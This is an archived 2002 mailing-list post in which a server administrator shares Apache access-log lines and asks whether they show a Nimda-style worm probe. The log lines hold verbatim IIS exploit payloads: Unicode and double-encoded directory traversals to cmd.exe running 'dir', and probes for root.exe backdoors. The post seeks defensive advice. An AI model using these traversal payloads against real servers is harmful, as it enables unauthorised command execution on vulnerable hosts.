httpd access log question

Subject: httpd access log question
From: Justin Dieters (enderak@yahoo.com)
Date: Wed Jan 16 2002 - 14:29:52 AKST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: Greg Madden: "Door Prize"
• Previous message: Mike Tibor: "Re: SSL problems"
• Next in thread: Greg Jetter: "Re: httpd access log question"

Hello all. I was browsing through my httpd access logs on my server today
and I noticed several lines that were repeated a few dozen times within the
span of a couple hours, all from the same ip (it looks to be a gci cable
modem ip) An of the lines is attached to the end of this message. Other
than these several blocks all together, there are no other instances I can
find. My question is does anyone know what all these accesses might mean?
It looks like it's trying to find some WinNT/2K files, so I'm thinking it
might be a ''run-of-the-mill'' Nimda attempt or somthing similar. What do
you all think? Should I be concerned? This was more than a month ago, and I
don't see anything else since then..

Thanks,
Justin
enderak@yahoo.com

--------------------

24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 288
24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 286
24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 327
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 327
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 343
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com

• Next message: Greg Madden: "Door Prize"
• Previous message: Mike Tibor: "Re: SSL problems"
• Next in thread: Greg Jetter: "Re: httpd access log question"

This archive was generated by hypermail 2a23 : Wed Jan 16 2002 - 14:30:10 AKST